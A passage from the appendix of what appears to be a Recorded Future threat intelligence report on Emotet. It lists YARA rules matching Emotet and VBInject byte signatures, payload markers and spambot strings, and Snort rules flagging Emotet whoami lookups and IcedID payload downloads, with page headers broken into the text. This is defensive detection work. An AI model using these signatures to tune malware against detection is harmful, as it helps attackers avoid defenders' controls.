$snippet3 = {83 3D ?? ?? ?? ?? 00 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 74 0A 51 
E8 ?? ?? ?? ?? 83 C4 04 C3 33 C0 C3} 
$snippet4 = {33 C0 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? 
?? A3 ?? ?? ?? ?? 39 05 ?? ?? ?? ?? 74 1D 8D 49 00 40 A3 ?? ?? ?? ?? 83 3C C5 ?? ?? ?? ?? 00 75 F0 51 E8 ?? 
?? ?? ?? 83 C4 04 C3} 
condition: 
//check for MZ Signature at offset 0 
uint16(0) == 0x5A4D and (($snippet1) and ($snippet2)) or ($snippet3) or ($snippet4) 
} 
 
__________________________________________ 
 
rule emotet_vbinject { 
strings: 
// data from the overlay 
$overlay = { BC4F626B1602B4C72F272F597BB633B1 } 
$pdb = { 
433A5C55736572735C4D5C4465736B746F705C737475627372635C42475C52656C656173655C42
472E70646200 } 
 
// various signatures used in vbinject samples to denote beginning/end of payload executable 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 18
 
 
CURRENT INTELLIGENCE REPORT 
 

$signature1 = "Ln15vg7sJn47WWEu8" ascii wide 

$signature2 = "6LojxNhv15weO85g1Az48poUhg" ascii wide 
$signature3 = "Ln15vg7sJn47WWEu8" 
$signature4 = "6LojxNhv15weO85g1Az48poUhg" 
$signature5 = "2659443231247816597746" 
 
// compressed pe payload header located in overlay section 
$compressed_pe_heade1r = "is)xrnnram canoot j" 
$compressed_pe_header2 = "rue%hn DOS fodd" 
 
// function prologue for a payload extraction function 
// 50512C47F028FD3BB80ACDEE84F2729B @ 0x4054E7 
$epilogue = { 
8B45088B55DC8BC85F5E5B89118B55E08951048B55E48951088B55E889510C8B4DEC64890D000
000008BE55DC21000 } 
condition: 
IsPeFile and (any of them) 
} 
 
__________________________________________ 
 
 
rule emotet4_basic: trojan 
{ 
meta: 
author = "psrok1/mak" 
module = "emotet" 
strings: 
$emotet4_rsa_public = { 8d ?? ?? 5? 8d ?? ?? 5? 6a 00 68 00 80 00 00 ff 35 [4] ff 35 [4] 6a 13 68 
01 00 01 00 ff 15 [4] 85 } 
$emotet4_cnc_list = { 39 ?? ?5 [4] 0f 44 ?? (FF | A3)} 
condition: 
all of them 
} 
 
 
__________________________________________ 
 
 
rule emotet4: trojan 
{ 
meta: 
author = "psrok1" 
module = "emotet" 
strings: 
$emotet4_x65599 = { 0f b6 ?? 8d ?? ?? 69 ?? 3f 00 01 00 4? 0? ?? 3? ?? 72 } 
condition: 
any of them and emotet4_basic 
} 
 
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 19
 
 
CURRENT INTELLIGENCE REPORT 
 

__________________________________________ 
 
 
rule emotet4_spam : spambot 
{ 
meta: 
author="mak" 
module="emotet" 
strings: 
$login="LOGIN" fullword 
$startls="STARTTLS" fullword 
$mailfrom="MAIL FROM:" 
condition: 
all of them and emotet4_basic 
} 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 20
 
 
CURRENT INTELLIGENCE REPORT 
 

Appendix B — Network Monitoring 

 
All SNORT​ ​signatures​ ​from Lenny Hansson 
 
(Emotet Banking Malware - whoami lookups) 
 
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"NF - Emotet Banking Malware - whoami - 
No Alert"; flow:to_server,established; content:"/whoami.php"; depth:15; fast_pattern; 
content:"Cache|2d|Control|3a 20|no|2d|cache"; flowbits:set,NF-twhoami; flowbits:noalert; 
reference:url,networkforensic.dk; metadata:27062018; classtype:trojan-activity; sid:5025903; 
rev:1;) 
__________________________________________ 
 
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"NF - Emotet Banking Malware - whoami 
lookup"; flow:to_client,established; content:"|32 30 30 20 4f 4b|"; fast_pattern; 
content:"Connection|3a 20|keep|2d|alive"; flowbits:isset,NF-twhoami; 
reference:url,networkforensic.dk; metadata:27062018; classtype:trojan-activity; sid:5025904; 
rev:1;) 
__________________________________________ 
 
(Emotet Banking Malware - IcedID payload download) 
 
alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"NF - Emotet Banking Malware - IcedID 
payload download - No alert"; flow:to_server,established; content:"GET"; depth:3; http_method; 
pcre:"/\/[a-zA-Z0-9]{4,10}\//iU"; Content:"Connection|3a 20|Keep|2d|Alive"; nocase; 
flowbits:set,NF-IcedID; flowbits:noalert; reference:url,networkforensic.dk; metadata:27062018; 
classtype:trojan-activity; sid:5025905; rev:1;) 
__________________________________________ 
 
alert tcp $EXTERNAL_NET 80 -> $HOME_NET any (msg:"NF - Emotet Banking Malware - IcedID 
payload download"; flow:from_server,established; content:"200"; http_stat_code; 
content:"Cache|2d|Control|3a 20|no|2d|cache|2c 20|no|2d|store|2c 
20|max|2d|age|3d|0|2c 20|must|2d|revalidate"; nocase; fast_pattern; 
content:"Content|2d|Disposition|3a 20|attachment|3b 20|"; 
pcre:"/filename=\"[a-zA-Z0-9]{4,6}.exe\"/"; flowbits:isset,NF-IcedID; 
reference:url,networkforensic.dk; metadata:27062018; classtype:trojan-activity; sid:5025906; 
rev:1;) 
 
 
 
 
 
About Recorded Future 
 
Recorded Future arms security teams with the only complete threat intelligence solution powered by patented machine learning to 
lower risk. Our technology automatically collects and analyzes information from an unrivaled breadth of sources and provides 
invaluable context in real time and packaged for human analysis or integration with security technologies.  

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 21